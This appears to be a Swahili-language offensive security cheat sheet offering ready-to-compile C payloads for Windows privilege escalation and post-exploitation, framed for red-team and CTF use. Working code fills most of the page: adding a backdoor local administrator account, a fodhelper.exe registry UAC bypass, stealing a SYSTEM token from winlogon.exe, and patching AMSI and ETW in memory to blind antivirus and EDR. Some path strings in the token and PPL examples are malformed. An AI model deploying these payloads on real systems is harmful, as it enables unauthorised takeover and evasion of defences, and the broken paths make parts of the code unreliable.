Malipo za C za Windows

Reading time: 6 minutes

Ukurasa huu unakusanya vipande vidogo vya C vilivyojitegemea vinavyokuwa vya manufaa wakati wa Windows Local Privilege Escalation au post-exploitation. Kila payload imeundwa kuwa rafiki kwa kunakili-na-kubandika, inahitaji tu Windows API / C runtime, na inaweza kukusanywa kwa i686-w64-mingw32-gcc (x86) au x86_64-w64-mingw32-gcc (x64).

⚠️ Payload hizi zinadhani kuwa mchakato tayari una vigezo vya chini vinavyohitajika kutekeleza kitendo (mfano SeDebugPrivilege, SeImpersonatePrivilege, au medium-integrity context kwa ajili ya UAC bypass). Zimetengenezwa kwa ajili ya red-team au CTF ambapo kutumia udhaifu kumesababisha arbitrary native code execution.

Ongeza mtumiaji wa msimamizi wa ndani

// i686-w64-mingw32-gcc -s -O2 -o addadmin.exe addadmin.c
#include <stdlib.h>
int main(void) {
system("net user hacker Hacker123! /add");
system("net localgroup administrators hacker /add");
return 0;
}

UAC Bypass – fodhelper.exe Registry Hijack (Medium → High integrity)

Wakati binary iliyoaminika fodhelper.exe inapoendeshwa, inatafuta njia ya registry hapa chini bila kuchuja kitenzi DelegateExecute. Kwa kuweka amri yetu chini ya ufunguo huo, mshambulizi anaweza bypass UAC bila kuacha faili kwenye diski.

Njia ya registry inayotafutwa na fodhelper.exe

HKCU\Software\Classes\ms-settings\Shell\Open\command

PoC ndogo inayofungua cmd.exe iliyoinuliwa:

// x86_64-w64-mingw32-gcc -municode -s -O2 -o uac_fodhelper.exe uac_fodhelper.c
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(void) {
HKEY hKey;
const char *payload = "C:\\Windows\\System32\\cmd.exe"; // change to arbitrary command

// 1. Create the vulnerable registry key
if (RegCreateKeyExA(HKEY_CURRENT_USER,
"Software\\Classes\\ms-settings\\Shell\\Open\\command", 0, NULL, 0,
KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS) {

// 2. Set default value => our payload
RegSetValueExA(hKey, NULL, 0, REG_SZ,
(const BYTE*)payload, (DWORD)strlen(payload) + 1);

// 3. Empty "DelegateExecute" value = trigger (")
RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ,
(const BYTE*)"", 1);

RegCloseKey(hKey);

// 4. Launch auto-elevated binary
system("fodhelper.exe");
}
return 0;
}

Imethibitishwa kwenye Windows 10 22H2 na Windows 11 23H2 (patches za Julai 2025). Bypass bado inafanya kazi kwa sababu Microsoft haijarekebisha ukaguzi wa uadilifu uliokosekana katika njia ya DelegateExecute.

Spawn SYSTEM shell via token duplication (SeDebugPrivilege + SeImpersonatePrivilege)

Ikiwa mchakato wa sasa una zote mbili ruhusa za SeDebug na SeImpersonate (kawaida kwa akaunti za huduma nyingi), unaweza kuiba token kutoka kwa winlogon.exe, kuiiga (duplicate), na kuanzisha mchakato wenye ruhusa za juu:

// x86_64-w64-mingw32-gcc -O2 -o system_shell.exe system_shell.c -ladvapi32 -luser32
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

DWORD FindPid(const wchar_t *name) {
PROCESSENTRY32W pe = { .dwSize = sizeof(pe) };
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snap == INVALID_HANDLE_VALUE) return 0;
if (!Process32FirstW(snap, &pe)) return 0;
do {
if (!_wcsicmp(pe.szExeFile, name)) {
DWORD pid = pe.th32ProcessID;
CloseHandle(snap);
return pid;
}
} while (Process32NextW(snap, &pe));
CloseHandle(snap);
return 0;
}

int wmain(void) {
DWORD pid = FindPid(L"winlogon.exe");
if (!pid) return 1;

HANDLE hProc   = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
HANDLE hToken  = NULL, dupToken = NULL;

if (OpenProcessToken(hProc, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken) &&
DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupToken)) {

STARTUPINFOW si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessWithTokenW(dupToken, LOGON_WITH_PROFILE,
L"C\\\\Windows\\\\System32\\\\cmd.exe", NULL, CREATE_NEW_CONSOLE,
NULL, NULL, &si, &pi)) {
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
if (hProc) CloseHandle(hProc);
if (hToken) CloseHandle(hToken);
if (dupToken) CloseHandle(dupToken);
return 0;
}

Kwa maelezo ya kina kuhusu jinsi hiyo inavyofanya kazi angalia:

SeDebug + SeImpersonate copy token

In-Memory AMSI & ETW Patch (Defence Evasion)

Mifumo mingi ya kisasa ya AV/EDR hutegemea AMSI na ETW kuchunguza tabia zenye hatari. Kurekebisha interfaces zote mapema ndani ya mchakato wa sasa kunazuia payloads zinazotegemea script (mfano PowerShell, JScript) zisichunguzwe.

// gcc -o patch_amsi.exe patch_amsi.c -lntdll
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdio.h>

void Patch(BYTE *address) {
DWORD oldProt;
// mov eax, 0x80070057 ; ret  (AMSI_RESULT_E_INVALIDARG)
BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
VirtualProtect(address, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProt);
memcpy(address, patch, sizeof(patch));
VirtualProtect(address, sizeof(patch), oldProt, &oldProt);
}

int main(void) {
HMODULE amsi  = LoadLibraryA("amsi.dll");
HMODULE ntdll = GetModuleHandleA("ntdll.dll");

if (amsi)  Patch((BYTE*)GetProcAddress(amsi,  "AmsiScanBuffer"));
if (ntdll) Patch((BYTE*)GetProcAddress(ntdll, "EtwEventWrite"));

MessageBoxA(NULL, "AMSI & ETW patched!", "OK", MB_OK);
return 0;
}

Patch iliyo hapo juu ni ya ndani ya mchakato (process-local); kuanzisha PowerShell mpya baada ya kuitekeleza kutaendelea bila ukaguzi wa AMSI/ETW.

Unda mchakato mtoto kama Protected Process Light (PPL)

Omba kiwango cha ulinzi cha PPL kwa mchakato mtoto wakati wa uundaji kwa kutumia STARTUPINFOEX + PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL. Hii ni API iliyodokumentishwa na itafanikiwa tu ikiwa image lengwa imepewa saini kwa daraja la saini linaloombwa (Windows/WindowsLight/Antimalware/LSA/WinTcb).

// x86_64-w64-mingw32-gcc -O2 -o spawn_ppl.exe spawn_ppl.c
#include <windows.h>

int wmain(void) {
STARTUPINFOEXW si = {0};
PROCESS_INFORMATION pi = {0};
si.StartupInfo.cb = sizeof(si);

SIZE_T attrSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);

DWORD lvl = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // choose the desired level
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
&lvl, sizeof(lvl), NULL, NULL);

if (!CreateProcessW(L"C\\\Windows\\\System32\\\notepad.exe", NULL, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
// likely ERROR_INVALID_IMAGE_HASH (577) if the image is not properly signed for that level
return 1;
}
DeleteProcThreadAttributeList(si.lpAttributeList);
HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}

Viwango vinavyotumika zaidi:

• PROTECTION_LEVEL_WINDOWS_LIGHT (2)
• PROTECTION_LEVEL_ANTIMALWARE_LIGHT (3)
• PROTECTION_LEVEL_LSA_LIGHT (4)

Thibitisha matokeo kwa Process Explorer/Process Hacker kwa kuangalia safu ya Protection.

Marejeleo

• Ron Bowes – “Fodhelper UAC Bypass Deep Dive” (2024)
• SplinterCode – “AMSI Bypass 2023: The Smallest Patch Is Still Enough” (BlackHat Asia 2023)
• CreateProcessAsPPL – minimal PPL process launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
• Microsoft Docs – STARTUPINFOEX / InitializeProcThreadAttributeList / UpdateProcThreadAttribute